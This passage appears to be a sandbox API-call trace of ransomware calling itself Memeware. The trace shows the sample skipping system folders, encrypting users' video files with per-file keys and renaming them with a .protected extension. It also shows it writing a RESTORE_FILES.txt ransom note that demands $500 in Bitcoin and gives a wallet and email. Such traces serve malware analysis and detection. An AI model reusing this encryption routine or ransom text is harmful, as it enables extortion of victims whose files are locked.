lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.856] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.856] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\RESTORE_FILES.txt") returned 87 [0092.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.886] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.886] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.886] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.886] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.887] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.887] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.887] CloseHandle (hObject=0xd8) returned 1 [0092.887] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.887] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.888] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\RESTORE_FILES.txt") returned 80 [0092.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.888] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.888] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.889] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.889] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.889] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.889] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0092.889] CloseHandle (hObject=0xd4) returned 1 [0092.890] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N") returned 54 [0092.890] lstrcmpW (lpString1="n-P4N", lpString2=".") returned 1 [0092.890] lstrcmpW (lpString1="n-P4N", lpString2="..") returned 1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\*") returned 56 [0092.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\.") returned 56 [0092.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.890] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) 
returned 1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\..") returned 57 [0092.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.890] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Windows") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Program Files") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Program Files (x86)") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="$Recycle.bin") returned 1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="System Volume Information") returned -1 [0092.891] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrIW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".protected") returned 0x0 [0092.891] lstrcmpW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0092.891] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.891] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.891] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".txt") returned 0x0 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".rar") returned 0x0 [0092.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".zip") returned 0x0 [0092.891] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.892] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.892] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.892] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.892] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.892] WriteFile (in: hFile=0xd8, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.892] CloseHandle (hObject=0xd8) returned 1 [0092.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv.protected") returned 81 [0092.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\4fj2qr6hfnqo.mkv.protected")) returned 1 [0092.893] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Windows") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Program Files") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="Program Files (x86)") returned -1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="$Recycle.bin") returned 1 [0092.893] lstrcmpiW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="System Volume Information") returned -1 [0092.893] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.893] StrStrIW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".protected") returned 0x0 [0092.894] lstrcmpW (lpString1="d6LQOdonjH8Fnr67m.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0092.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.894] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".txt") returned 0x0 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".rar") returned 0x0 [0092.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv") returned 76 [0092.894] StrStrW (lpFirst="d6LQOdonjH8Fnr67m.mkv", lpSrch=".zip") returned 0x0 [0092.894] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.895] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.895] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.895] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.895] 
WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.895] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.895] CloseHandle (hObject=0xd8) returned 1 [0092.895] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv.protected") returned 86 [0092.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\d6LQOdonjH8Fnr67m.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\d6lqodonjh8fnr67m.mkv.protected")) returned 1 [0092.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Windows") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Program Files") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="Program Files (x86)") returned -1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="$Recycle.bin") returned 1 [0092.896] lstrcmpiW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="System Volume Information") returned -1 [0092.896] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrIW 
(lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".protected") returned 0x0 [0092.896] lstrcmpW (lpString1="NSm97COf--gBhaYyMeA.avi", lpString2="RESTORE_FILES.txt") returned -1 [0092.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.896] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".txt") returned 0x0 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".rar") returned 0x0 [0092.896] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi") returned 78 [0092.896] StrStrW (lpFirst="NSm97COf--gBhaYyMeA.avi", lpSrch=".zip") returned 0x0 [0092.896] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.897] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.897] CloseHandle (hObject=0xd8) returned 1 [0092.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi.protected") returned 88 [0092.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\NSm97COf--gBhaYyMeA.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\n-p4n\\nsm97cof--gbhayymea.avi.protected")) returned 1 [0092.898] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Windows") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Program Files") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="Program Files (x86)") returned -1 [0092.898] lstrcmpiW (lpString1="ofEIt.swf", lpString2="$Recycle.bin") returned 1 [0092.898] 